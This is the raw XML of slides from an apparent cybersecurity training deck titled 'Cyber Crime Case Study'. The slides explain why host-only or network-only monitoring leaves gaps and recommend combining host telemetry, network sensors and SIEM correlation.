            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14"/>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15" name="AutoShape 15"/>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16" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9284814" y="1990542"/>
            <a:ext cx="7573194" cy="6626544"/>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51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9859945" y="1692737"/>
            <a:ext cx="7573194" cy="6626544"/>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blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect l="-15543" r="-15543"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1078911"/>
            <a:ext cx="12725393" cy="1702389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C51AF6"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Gaps in Host-Only or Network-Only Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3316713" y="5753100"/>
            <a:ext cx="8722887" cy="1283044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>If you only monitor the network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425205" y="2857500"/>
            <a:ext cx="7309950" cy="1283044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>If you only monitor the host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425205" y="4309110"/>
            <a:ext cx="11055897" cy="1289456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Encrypted C2 traffic hides on the network → you never see it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Lateral movement over SSH looks normal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Crypto-miners talk over TLS → invisible to simple network rules </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425205" y="7056906"/>
            <a:ext cx="12424395" cy="1702325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Fileless execution, user commands, privilege escalation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t> abuse happen entirely on the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Local privilege escalation exploits produce no obvious network artifacts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Attackers can disable logging locally and stay invisible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 26"/>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05/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="AutoShape 27"/>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29" name="Freeform 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3262156" y="5445276"/>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10067446" y="-3578638"/>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15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 3"/>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07/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21716668" y="0"/>
              <a:ext cx="0" cy="1010172"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="508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934303" y="2582372"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 7"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 8"/>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9" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10137211" y="2582372"/>
            <a:ext cx="7122089" cy="5718262"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7467600" cy="5995670"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 10"/>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FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 11"/>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US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 12"/>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US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13"/>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t="-66" b="-66"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2920177" y="2714393"/>
            <a:ext cx="7493735" cy="1308435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4261" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Answers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4261" b="1" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Horizon"/>
              <a:ea typeface="Horizon"/>
              <a:cs typeface="Horizon"/>
              <a:sym typeface="Horizon"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762366" y="2833456"/>
            <a:ext cx="1769968" cy="796372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2920177" y="3637092"/>
            <a:ext cx="5866953" cy="4309834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>This is why mature SOC architecture requires both host + network telemetry: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>✅ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sysmon for Linux or auditd → process execution, commands, file changes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>✅ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suricata/Zeek → C2, DNS tunneling, TLS metadata, lateral movement</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>✅ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Correlation in SIEM → join host &amp; network to expose the full kill chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9914541" y="-2643143"/>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1414970" y="8927241"/>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0" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4881221" y="715946"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="AutoShape 21"/>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2" name="AutoShape 22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8826751" y="7824282"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="AutoShape 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="422998"/>
              <a:ext cx="845997" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="85596" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="AutoShape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="422998" y="0"/>
              <a:ext cx="0" cy="845997"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="85596" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>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13046</TotalTime>
  <Words>1869</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>180</Paragraphs>
  <Slides>19</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Horizon</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Anonymous Pro</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>-apple-system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Cyber Crime  Case Study   </dc:title>
  <cp:lastModifiedBy>Ted Skinner</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-16T21:59:46Z</dcterms:modified>
  <dc:identifier>DAGmV-49b-c</dc:identifier>
</cp:coreProperties>
</file>